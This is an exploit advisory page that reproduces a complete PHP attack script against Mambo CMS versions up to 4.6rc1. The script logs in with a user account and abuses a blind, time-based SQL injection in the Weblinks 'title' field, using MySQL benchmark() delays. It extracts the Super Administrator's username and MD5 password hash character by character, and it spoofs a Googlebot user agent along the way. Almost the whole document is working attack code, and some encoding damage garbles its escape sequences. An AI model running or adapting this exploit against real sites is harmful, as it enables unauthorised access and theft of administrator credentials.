Mambo <= 4.6rc1 sql injection

Advisory Content :

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin
credentialsrn";

echo "disclosure exploit (benchmark() vesion)rn";

echo "by rgod rgod (at) autistici (dot) org [email concealed]rn";

echo "site: http://retrogod.altervista.orgrn";

echo "this is called the Sun-Tzu 'trascendental guru meditation'
tecniquernrn";

if ($argc<5) {

echo "Usage: php ".$argv[0]." host path user pass OPTIONSrn";

echo "host: target server (ip/hostname)rn";

echo "path: path to Mamborn";

echo "user/pass: you need an accountrn";

echo "Options:rn";

echo " -T[prefix] specify a table prefix different from 'mos_'rn";

echo " -p[port]: specify a port other than 80rn";

echo " -P[ip:port]: specify a proxyrn";

echo "Example:rn";

echo "php ".$argv[0]." localhost /mambo/ username passwordrn";

die;

}

/*

explaination:

sql injection in "title" argument when you submit a web link, poc:

start mysql daemon with log option...

>mysqld --log=mambo.txt

now login, go to "Submit Weblink" feature, in "Name: " field type:

99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1,
benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super
Administrator'/*

in mambo.txt we have:

13 Query SELECT id FROM mos_weblinks

WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) &
1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super
Administrator'/*' AND catid='2'

injection is blind but, as you can see, we can you use time delays through
Mysql

benchmark() function to ask questions about tables

this works regardless of magic_quotes_gpc settings

*/

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=" .";}

else

{$result.=" ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}

}

return $exa."rn".$result;

}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "rn".$html;

}

function is_hash($hash)

{

if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}

else {return false;}

}

$host=$argv[1];

$path=$argv[2];

$user=$argv[3];

$pass=$argv[4];

$port=80;

$prefix="mos_";

$proxy="";

for ($i=5; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

if ($temp=="-T")

{

$prefix=str_replace("-T","",$argv[$i]);

}

}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check
the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data ="username=".$user;

$data.="&passwd=".$pass;

$data.="&remember=yes";

$data.="&option=login";

$data.="&Submit=login";

$data.="&op2=login";

$data.="âŒ©=english";

$data.="&return=".urlencode("http://".$host.$path);

$data.="&message=0";

$packet ="POST ".$p." HTTP/1.0rn";

$packet.="Host: ".$host."rn";

$packet.="Accept: text/plainrn";

$packet.="Connection: Closern";

$packet.="Content-Type: application/x-www-form-urlencodedrn";

$packet.="Content-Length: ".strlen($data)."rnrn";

$packet.=$data;

sendpacketii($packet);

$temp=explode("Set-Cookie: ",$html);

$cookie="";

for ($i=1; $i<=count($temp)-1; $i++)

{

$temp2=explode(" ",$temp[$i]);

$cookie.=" ".$temp2[0];

}

if ((strstr($cookie,"=+;")) | $cookie=="") {die("Unable to login...");}

else

{

echo "Done...rncookie -> ".$cookie."rn";

}

$j=1;$admin="";

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

$starttime=time();

$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.")
& 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE
usertype='Super Administrator'/*";

echo "rn".$sql."rn";

$sql=urlencode($sql);

$data ="title=".$sql;

$data.="&catid=2";

$data.="&url=http://www.google.com";

$data.="&description=";

$data.="&id=0";

$data.="&option=com_weblinks";

$data.="&task=save";

$data.="&ordering=0";

$data.="&approved=0";

$data.="&Returnid=0";

$packet ="POST ".$p."index.php HTTP/1.0rn";

$packet.="User-Agent: Googlebot/2.1rn";

$packet.="Host: ".$host."rn";

$packet.="Accept: text/plainrn";

$packet.="Connection: Closern";

$packet.="Content-Type: application/x-www-form-urlencodedrn";

$packet.="Cookie: ".$cookie."rn";

$packet.="Content-Length: ".strlen($data)."rnrn";

$packet.=$data;

//debug

//echo quick_dump($packet)."rn";

sendpacketii($packet);

$endtime=time();

echo "endtime -> ".$endtime."rn";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."rn";

if ($difftime > 7) {$admin.=chr($i);echo "admin ->
".$admin."[???]rn";sleep(2);break;} //more than seven seconds? we
succeed...

if ($i==255) {die("Exploit failed...");}

}

$j++;

}

$md5s[0]=0;//null

$md5s=array_merge($md5s,range(48,57)); //numbers

$md5s=array_merge($md5s,range(97,102));//a-f letters

//print_r(array_values($md5s));

$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$md5s))

{

$starttime=time();

$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.")
& 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE
usertype='Super Administrator'/*";

echo "rn".$sql."rn";

$sql=urlencode($sql);

$data ="title=".$sql;

$data.="&catid=2";

$data.="&url=http://www.google.com";

$data.="&description=";

$data.="&id=0";

$data.="&option=com_weblinks";

$data.="&task=save";

$data.="&ordering=0";

$data.="&approved=0";

$data.="&Returnid=0";

$packet ="POST ".$p."index.php HTTP/1.0rn";

$packet.="User-Agent: Googlebot/2.1rn";

$packet.="Host: ".$host."rn";

$packet.="Accept: text/plainrn";

$packet.="Connection: Closern";

$packet.="Content-Type: application/x-www-form-urlencodedrn";

$packet.="Cookie: ".$cookie."rn";

$packet.="Content-Length: ".strlen($data)."rnrn";

$packet.=$data;

//debug

//echo quick_dump($packet)."rn";

sendpacketii($packet);

$endtime=time();

echo "endtime -> ".$endtime."rn";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."rn";

if ($difftime > 7) {$password.=chr($i);echo "password ->
".$password."[???]rn";sleep(2);break;}

}

if ($i==255) {die("Exploit failed...");}

}

$j++;

}

//if you are here...

echo "Exploit succeeded...rn";

echo
"--------------------------------------------------------------------r
n";

echo "admin -> ".$admin."rn";

echo "password (md5) -> ".$password."rn";

echo
"--------------------------------------------------------------------r
n";

?>

original url: http://retrogod.altervista.org/mambo_46rc1_sql.html

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason